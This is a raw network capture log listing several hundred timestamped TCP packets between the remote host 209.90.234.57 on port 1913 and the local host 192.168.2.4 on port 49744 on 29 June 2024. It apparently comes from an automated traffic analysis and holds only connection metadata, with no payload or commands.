Jun 29, 2024 10:02:26.663348913 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.663386106 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.663409948 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.663429976 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.663484097 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.663621902 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.663630009 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.663633108 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.663635969 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.663642883 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.663650036 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.663656950 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.663669109 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.663676023 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.663682938 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.663688898 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.663697004 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.663703918 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.663711071 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.663724899 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.663732052 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.663760900 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.663768053 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.663800001 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.663898945 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.663906097 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.663913012 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.663927078 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.663933992 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.663981915 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.663990021 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.663997889 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.664072990 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.664079905 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.664129972 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.664138079 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.664144993 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.664151907 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.664164066 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.664170980 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.664200068 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.664223909 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.664231062 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.664254904 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.664262056 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.664269924 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.664280891 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.664288998 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.664547920 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.664556980 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.664562941 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.664575100 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.664582968 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.664589882 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.664597034 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.664599895 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.664602995 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.664609909 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.664617062 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.664623022 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.664629936 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.664640903 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.664648056 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.664650917 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.664671898 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.664680004 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.668520927 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.668529987 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.668732882 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.668740988 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.668860912 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.668869019 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.668879032 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.668936014 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.668967962 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.668976068 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.669002056 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.669011116 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.669018030 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.669229984 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.669238091 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.669245005 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.669253111 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.669260025 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.669266939 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.669275045 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.669313908 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.669358969 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.670218945 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.670227051 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.670234919 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.670243025 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.670249939 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.670257092 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.670264959 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.670280933 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.670288086 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.670295954 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.670303106 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.670311928 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.670320034 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.670361042 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.670368910 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.670408964 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.670417070 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.670432091 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.670439959 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.670474052 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.670495987 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.670547962 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.670556068 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.670578003 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.670587063 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.670643091 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.670650959 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.670685053 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.670694113 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.670741081 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.670749903 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.670770884 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.670804977 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.670813084 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.670821905 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.670830011 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.670850992 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.670861959 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.670870066 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.670906067 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.670914888 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.670922995 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.670931101 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.671005011 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.671014071 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.671020985 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.671029091 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.671106100 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.671113968 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.671120882 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.671128988 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.671135902 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.671144009 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.671150923 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.671159029 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.675735950 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.675832987 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.675841093 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.675849915 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.675971985 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.675980091 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676007032 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676014900 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676065922 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676074028 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676083088 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676090956 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676229954 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676239014 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676281929 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676290989 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676309109 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676316977 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676338911 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676347017 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676393032 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676400900 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676410913 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676472902 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676486015 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676495075 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676510096 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676517963 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676561117 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676568985 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676583052 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676590919 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676604986 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676611900 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676636934 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676645041 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676686049 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676693916 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676709890 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676717043 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676752090 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676759958 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676896095 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676903963 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676912069 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676919937 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676927090 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676934004 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676942110 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.676949024 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.677037001 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.677045107 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.677052021 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.677443027 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.677531004 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.682463884 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.682473898 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.682497025 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.682504892 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.682539940 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.682565928 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.682619095 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.682626963 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.682634115 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.682641983 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.682651043 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.682693005 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.682703018 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.682709932 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.682744026 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.682753086 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.682760954 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.682770014 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.682813883 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.682821989 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.682934046 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.682941914 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.682950020 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.682956934 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.682965040 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.683036089 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.683043957 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.683052063 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.683060884 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.683068991 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.683075905 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.683084011 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.683145046 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.683152914 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.683160067 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.683167934 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.683176994 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.683183908 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.683192015 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.683199883 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.683273077 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.683280945 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.683289051 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.683296919 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.683305025 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.683311939 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.683314085 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.683321953 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.683330059 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.683336973 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.683345079 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.683398008 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.683413982 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.683422089 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.683429003 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.688246965 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.688312054 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.688321114 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.688340902 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.688457012 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.688465118 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.688479900 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.688493967 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.688503027 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.688596964 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.688605070 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.688612938 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.688620090 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.688630104 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.688679934 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.688688040 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.688694954 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.688709021 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.688716888 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.688725948 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.688817978 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.688826084 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.688842058 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.688848972 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.688927889 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.688942909 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.688950062 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.689049959 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.689059019 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.689065933 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.689107895 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.689116955 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.689124107 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.689131975 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.689137936 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.689157963 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.689166069 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.689215899 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.689265013 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.689274073 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.689280987 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.689287901 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.689296007 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.689354897 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.689363003 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.689369917 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.689378023 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.689384937 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.689393044 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.689435959 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.689444065 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.689472914 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.689481020 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.689496994 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.689537048 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.693994999 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.694112062 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.694119930 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.694145918 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.694257021 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.694264889 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.694304943 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.694314003 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.694320917 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.694360018 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.694367886 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.694448948 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.694457054 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.694487095 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.694495916 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.694531918 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.694546938 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.694626093 CEST	1913	49744	209.90.234.57	192.168.2.4
